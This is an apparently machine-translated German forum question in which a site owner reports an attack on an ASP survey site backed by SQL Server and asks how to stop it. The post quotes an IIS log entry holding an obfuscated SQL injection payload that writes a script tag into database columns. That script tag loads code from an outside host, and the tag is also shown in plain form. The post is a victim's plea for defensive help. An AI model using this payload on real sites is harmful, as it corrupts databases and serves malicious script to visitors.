Angriff auf die ASP-Seite verwendet eine SQL server-Datenbank

Wir haben eine Umfrage vor Ort wurde offenbar angegriffen. Die Symptome sind identisch zu dem, was beschrieben wurde, auf der folgenden Seite auf dieser Website:
XSS-Angriff auf die ASP.NET Website.

Fand ich mehrere Einträge in unserem IIS-Protokolle enthalten, dass der schädliche code:

< /title> < script src = http : //google-stats49.info/ur.php >.

Hier ist ein Beispiel für den Wert der cs-uri-query-Feld für eine der IIS-log-Einträge.

surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

Ich verstehe nicht, wie der obige code funktioniert, aber anscheinend ist das, was gesendet wird in einem query-string zu verderben Spalten in unserer Datenbank Tabellen. Haben wir heruntergefahren unsere Website zur Zeit. Wir können entfernen Sie die Skripte aus der Datenbank aber nicht verhindern, dass es beschädigt wieder, wenn wir die site wieder online.

Hat jemand irgendwelche Vorschläge auf, wie dies zu verhindern?

InformationsquelleAutor der Frage David | 2010-09-24

Schreibe einen Kommentar